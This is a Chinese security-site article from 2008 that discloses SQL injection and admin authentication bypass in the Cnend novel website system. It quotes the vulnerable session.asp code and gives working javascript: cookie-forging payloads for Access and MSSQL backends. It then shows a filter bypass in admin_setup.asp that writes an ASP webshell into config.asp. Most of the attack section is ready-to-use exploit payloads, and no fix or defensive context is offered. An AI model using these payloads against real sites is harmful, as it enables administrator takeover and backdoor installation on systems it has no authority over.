| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 安全技术首页 | 技术研究 | 技术应用 | 数据安全 | 企业专区 |
终点小说系统用户验证漏洞
终点小说系统用户验证漏洞
作者:未知 文章来源:网络 点击数: 更新时间:2008-1-9 1:25:48
漏洞文件:session.asp
程序代码:
if request.cookies("CnendWeb")("admininfo_loginname")<>"" and request.cookies("CnendWeb")("admininfo_logname")<>"" then  
   set rs=server.createobject("adodb.recordset")
   sql="select * from [admin_user] where username=’"&request.cookies("CnendWeb")("admininfo_logname")&"’"

……

if rs("password")<>request.cookies("CnendWeb")("admininfo_logpassword") then

……

得到COOKIE里的用户名带入判断没有过滤.MSSQL的利用方法就很简单了.说下ACCESS的.
构造admininfo_loginname = jackal’ and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin_user where ’1’=’1
查询出来对应的password就是4文章可以看下前面的雷驰漏洞.
简单构造下JS,IE地址栏运行,再访问后台就可以了.MSSQL会报错.TEXT和INT的类型错误.自己处理.
ACCESS:
程序代码: [ 复制代码到剪贴板 ] [ 运行代码 ]  
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27+union+select+1%2C2%2

C3%2C%274%27%2C5%2C6%2C7%2C8%2C9+from+admin%5Fuser+where+%271%27%3D%271&admini

nfo%5Flogpassword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")

MSSQL:
程序代码: [ 复制代码到剪贴板 ] [ 运行代码 ]  
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27%2B%61%6E%64%2B%31

%3D%40%40%76%65%72%73%69%6F%6E%2B%61%6E%64%2B%27%27%3D%27&admininfo%5Flogpas

sword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")

后台写WEBSHELL
逻辑错误的过滤方式:

admin_setup.asp


引用内容:
   WebmasterEmail=Replace(Replace(request.form("WebmasterEmail"),"<"&"%",""),"%"&">","")


过滤掉了"<%"和"%>"
但是我们写入

test"%%>><<%%Execute(Request("a"))%%>>

过滤之后就变成了test"%><%Execute(Request("a"))%>

访问config.asp
成功得到webshell.  
文章录入:郝丽    责任编辑:郝丽 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    病毒再次作怪 使电脑系
    细化解析:设置Sybase用
    安德鲁室内无线解决方案
    为一台机器设置两个IP地
    "IRC波特变种BBU"修改系
    “灰鸽子”最新变种 威胁
    再暴蚂蚁影院系统的注射
    巧妙利用系统控制台删除
    不只系统崩溃 病毒破坏硬
    系统DLL技术助力木马静态
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有